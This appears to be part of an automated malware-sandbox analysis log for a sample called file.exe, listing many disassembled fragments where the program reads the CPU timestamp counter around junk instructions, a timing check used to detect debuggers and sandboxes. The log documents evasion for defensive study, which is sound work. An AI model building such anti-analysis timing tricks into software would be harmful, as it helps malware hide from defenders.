Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C70461 second address: C70488 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F927881D806h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d jmp 00007F927881D818h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C74838 second address: C7483D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7483D second address: C74854 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F927881D811h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C74854 second address: C74858 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C74B17 second address: C74B1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C74B1B second address: C74B21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C74B21 second address: C74B27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C74CB0 second address: C74CB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C74CB8 second address: C74CBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C74F4F second address: C74F53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C751CD second address: C751D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C751D1 second address: C751F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F9278BE2826h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F9278BE2834h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C751F4 second address: C751F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7E012 second address: C7E018 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7E018 second address: C7E023 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7E023 second address: C7E039 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F9278BE282Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7E039 second address: C7E05A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F927881D812h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a jc 00007F927881D837h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7E05A second address: C7E05E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7E05E second address: C7E062 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7E062 second address: C7E06F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7E06F second address: C7E075 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7BFA7 second address: C7BFAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7C26A second address: C7C275 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F927881D806h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7C275 second address: C7C27A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7C86E second address: C7C872 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7C872 second address: C7C878 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7C878 second address: C7C890 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F927881D810h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7C890 second address: C7C8A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 jns 00007F9278BE2826h 0x0000000e pop eax 0x0000000f push edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7C8A2 second address: C7C8A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7D49A second address: C7D4B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9278BE2837h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7D4B5 second address: C7D4BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7D4BF second address: C7D4C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7D790 second address: C7D794 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7D794 second address: C7D79A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7DA32 second address: C7DA70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F927881D80Fh 0x00000009 jmp 00007F927881D813h 0x0000000e popad 0x0000000f jmp 00007F927881D817h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C86472 second address: C86476 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8618F second address: C86197 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C879C2 second address: C879C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8D6D7 second address: C8D6DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8DE61 second address: C8DE6E instructions: 0x00000000 rdtsc 0x00000002 jc 00007F9278BE2826h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8DE6E second address: C8DE74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8DE74 second address: C8DE99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9278BE2831h 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jc 00007F9278BE2828h 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push eax 0x00000017 pop eax 0x00000018 pop eax 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8DE99 second address: C8DEC6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F927881D816h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b jmp 00007F927881D811h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8E2E2 second address: C8E2F2 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F9278BE282Ah 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8E2F2 second address: C8E2F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8E421 second address: C8E42B instructions: 0x00000000 rdtsc 0x00000002 ja 00007F9278BE2832h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8E568 second address: C8E56C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8E56C second address: C8E574 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8E574 second address: C8E57D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop edi 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C96B38 second address: C96B58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F9278BE2826h 0x0000000a popad 0x0000000b jmp 00007F9278BE2835h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C96817 second address: C9681B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C980ED second address: C980FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F9278BE2826h 0x00000009 push edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C980FA second address: C98131 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jg 00007F927881D823h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 pop esi 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C98131 second address: C98138 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C98138 second address: C98144 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F927881D806h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C98144 second address: C98148 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA7170 second address: CA717A instructions: 0x00000000 rdtsc 0x00000002 je 00007F927881D812h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA717A second address: CA7180 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA6B10 second address: CA6B2B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F927881D814h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA6C63 second address: CA6C67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA6C67 second address: CA6C80 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F927881D813h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA6C80 second address: CA6CAB instructions: 0x00000000 rdtsc 0x00000002 jc 00007F9278BE2828h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jmp 00007F9278BE2839h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 pop esi 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA6CAB second address: CA6CB5 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F927881D806h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA6CB5 second address: CA6CBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB1B63 second address: CB1B67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB1B67 second address: CB1B6D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC1B64 second address: CC1B6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F927881D806h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC0710 second address: CC0714 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC0B84 second address: CC0B8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC181D second address: CC1823 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC1823 second address: CC182C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC182C second address: CC1834 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD151D second address: CD1521 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD1521 second address: CD152F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007F9278BE2826h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD152F second address: CD1542 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F927881D80Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD1542 second address: CD1548 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD8984 second address: CD8988 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD883D second address: CD8842 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE62F3 second address: CE62F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE6193 second address: CE6198 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE8C44 second address: CE8C61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F927881D815h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D01FFB second address: D01FFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D01FFF second address: D0200F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a je 00007F927881D806h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0200F second address: D0202B instructions: 0x00000000 rdtsc 0x00000002 jg 00007F9278BE2826h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d jnp 00007F9278BE2836h 0x00000013 pushad 0x00000014 jng 00007F9278BE2826h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D01071 second address: D01079 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D011D2 second address: D011F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jc 00007F9278BE2826h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F9278BE282Eh 0x00000013 push edx 0x00000014 pop edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D011F0 second address: D011F6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0132C second address: D01332 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D01332 second address: D0133A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0133A second address: D01371 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 pushad 0x00000007 jp 00007F9278BE2838h 0x0000000d jmp 00007F9278BE2830h 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F9278BE2830h 0x0000001b jp 00007F9278BE2826h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D017A4 second address: D017B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 js 00007F927881D806h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0190A second address: D0190E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0190E second address: D01930 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F927881D816h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D01930 second address: D01934 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D01934 second address: D01938 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D01A7E second address: D01A82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D01A82 second address: D01ABA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 js 00007F927881D806h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F927881D80Ch 0x00000013 jp 00007F927881D81Eh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D01ABA second address: D01ABF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D01ABF second address: D01AD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F927881D806h 0x0000000a popad 0x0000000b jnp 00007F927881D80Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D038BC second address: D038C2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D038C2 second address: D038C7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0374F second address: D03759 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D08FEA second address: D08FF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jno 00007F927881D806h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D08FF6 second address: D09012 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9278BE2838h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D09012 second address: D09018 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0ACBE second address: D0ACC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0ACC2 second address: D0ACC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DC00BF second address: 4DC00C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DC00C5 second address: 4DC011E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F927881D80Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F927881D80Eh 0x00000011 push eax 0x00000012 pushad 0x00000013 call 00007F927881D811h 0x00000018 pushfd 0x00000019 jmp 00007F927881D810h 0x0000001e sbb ah, FFFFFFF8h 0x00000021 jmp 00007F927881D80Bh 0x00000026 popfd 0x00000027 pop esi 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
